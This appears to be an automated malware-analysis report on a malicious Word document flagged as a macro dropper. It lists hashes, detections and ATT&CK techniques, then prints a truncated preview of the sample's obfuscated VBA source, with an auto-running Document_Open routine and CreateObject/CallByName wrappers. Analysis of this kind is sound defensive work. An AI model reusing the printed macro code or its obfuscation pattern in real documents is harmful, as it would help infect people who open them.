Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 07581e414a01402b…

MALICIOUS

Office (OLE)

Size: 112.0 KB | Created: 2016-04-27 22:59:00 | Authoring application: Microsoft Office Word | First seen: 2019-04-17
MD5: 4054dc017c4fde3b38de33cdd5659645 | SHA-1: c34ba6adc0ce111616c5b94ceb9697a5f6f7536b | SHA-256: 07581e414a01402b8a9dd55eeb6c2b3e1b62749a754ccfe95f686baf7b3800a9
Risk Score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic | T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is designed to execute code using 'CreateObject' and 'CallByName', indicating an attempt to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-1399074' further confirms its malicious nature as a dropper.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-1399074 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1399074
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15092 bytes
SHA-256: 6744947cfdb4bc20575fb3dc126d6ef49157eddcaa3c573f644f6480c2fb204e

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const PuZSwihqCFjom As Variant = "gz7Yx"
Private Sub Document_Open()
XY5rIEc4.DDMQoRjo6d
End Sub
Public Sub ATgjAr()
Dim QfScd5 As Object
Dim ihO3wnp As Variant, fxSEPoPytrzV As Integer
Dim j85OvD30lz As String
On Error GoTo lRxiXYrcpKMPKS
Set QfScd5 = QDyyG4R0fcV7Y.Ir2UUDUGwJ(FcA8Mv2HeOONFy(Cx2B5Q1t.RqMXIWa, 44), XY5rIEc4.y4dW4Paqca)
fxSEPoPytrzV = scPZ0Cvkp.CE24LeC5(QfScd5, FcA8Mv2HeOONFy(Cx2B5Q1t.fHKmDaxJrbZe, 93))
If fxSEPoPytrzV <> XY5rIEc4.AHostVAcVzK21 Then
Err.Raise Number:=1
End If
ihO3wnp = scPZ0Cvkp.CE24LeC5(QfScd5, FcA8Mv2HeOONFy(Cx2B5Q1t.oNzdMi, 296))
j85OvD30lz = XY5rIEc4.K8VFl2 & XY5rIEc4.agKo5o6wW & XY5rIEc4.AM1G8nMHxwsb
QDyyG4R0fcV7Y.RHIsQQXzamNRtmh j85OvD30lz, ihO3wnp
QDyyG4R0fcV7Y.v1ARktfJL2lUt j85OvD30lz
Exit Sub
lRxiXYrcpKMPKS:
End Sub
Private Sub GoFHyxrJqNmubUjdC()
wrlqTivs
End Sub

Attribute VB_Name = "Cx2B5Q1t"
Attribute VB_Base = "0{EF05BECA-CAD1-41B1-9035-B643BA189533}{4331C64B-FB9F-492B-83FB-0F4EDA4065AA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "scPZ0Cvkp"
Public Function zJCApTh7DPrJc66(ByVal e8BNpUbbbycg As Object, ByVal KR7UG5nruz As String, ByVal lYBRuHlQQ As Variant, ByVal xTGXWi As Variant, ByVal kijgCNlt3I As Variant) As Variant
zJCApTh7DPrJc66 = CallByName(e8BNpUbbbycg, KR7UG5nruz, 1, lYBRuHlQQ, xTGXWi, kijgCNlt3I)
End Function
Public Function uikE875oaX8q1(ByVal ysmMKr As String) As Object
Set uikE875oaX8q1 = CreateObject(ysmMKr)
End Function
Public Sub GY9zkfrKLHTQzgN(ByVal e8BNpUbbbycg As Variant, ByVal KR7UG5nruz As Variant, ByVal lYBRuHlQQ As Variant, ByVal xTGXWi As Variant)
CallByName e8BNpUbbbycg, KR7UG5nruz, 1, lYBRuHlQQ, xTGXWi
End Sub
Public Function l7aZ8S3X(ByVal e8BNpUbbbycg As Object, ByVal KR7UG5nruz As String, ByVal zTdHsv As Variant)
l7aZ8S3X = CallByName(e8BNpUbbbycg, KR7UG5nruz, 1, zTdHsv)
End Function
Public Function uoYPb1(ByVal MEy3tFNOhauiqcc As Variant) As Variant
Set uoYPb1 = GetObject(MEy3tFNOhauiqcc)
End Function
Public Function aWTQyzC2iOKD(ByVal e8BNpUbbbycg As Object, ByVal KR7UG5nruz As String, ByVal zTdHsv As Variant) As Variant
Set aWTQyzC2iOKD = CallByName(e8BNpUbbbycg, KR7UG5nruz, 1, zTdHsv)
End Function
Public Function CE24LeC5(ByVal e8BNpUbbbycg As Object, ByVal jKJo3WQIsbgPiH As String) As Variant
CE24LeC5 = CallByName(e8BNpUbbbycg, jKJo3WQIsbgPiH, 2)
End Function
Public Sub tmQN9NYLgV8(ByVal e8BNpUbbbycg As Object, ByVal KR7UG5nruz As String)
CallByName e8BNpUbbbycg, KR7UG5nruz, 1
End Sub
Public Sub nVpZOWq(ByVal e8BNpUbbbycg As Object, ByVal KR7UG5nruz As String, ByVal zTdHsv As Variant)
CallByName e8BNpUbbbycg, KR7UG5nruz, 1, zTdHsv
End Sub
Public Sub GnKAw3jL7nRs2()
Application.Run XY5rIEc4.VKUZi2aE6IIf
End Sub
Public Sub m2zgLvK1NE3B(ByVal e8BNpUbbbycg As Object, ByVal jKJo3WQIsbgPiH As String, ByVal rlcX0yZ As Variant)
CallByName e8BNpUbbbycg, jKJo3WQIsbgPiH, 4, rlcX0yZ
End Sub

Attribute VB_Name = "Xan5IzwvjavTxhL"
Private Const RmFSdO As Variant = "s1izxV7um9oybQD"
Private Const REvwCcn As String = "VHfm86dZO1XpDIv7h"
Public Function ltqsiEr() As Boolean
Dim hAA78SvDl6kABD As String
Dim tVMG80njxnyN As Object
Dim H4SLWr6iMWR As Variant
Dim PFCaQuBtNEEgT As Variant
For Each tVMG80njxnyN In QDyyG4R0fcV7Y.FAWX9dhAprU
H4SLWr6iMWR = scPZ0Cvkp.CE24LeC5(tVMG80njxnyN, XY5rIEc4.FcA8Mv2HeOONFy(Cx2B5Q1t.gZcVwcHjBhR, 244))
hAA78SvDl6kABD = scPZ0Cvkp.CE24LeC5(tVMG80njxnyN, XY5rIEc4.FcA8Mv2HeOONFy(Cx2B5Q1t.UiWfLQYwq, 72))
For Each PFCaQuBtNEEgT In XY5rIEc4.JWv4tQbtgpqOX
If XY5rIEc4.HBIocv(H4SLWr6iMWR, PFCaQuBtNEEgT) Or XY5rIEc4.HBIocv(hAA78SvDl6kABD, PFCaQuBtNEEgT) Then GoTo sXsfci
Next
Next
ltqsiEr = Fals
... (truncated)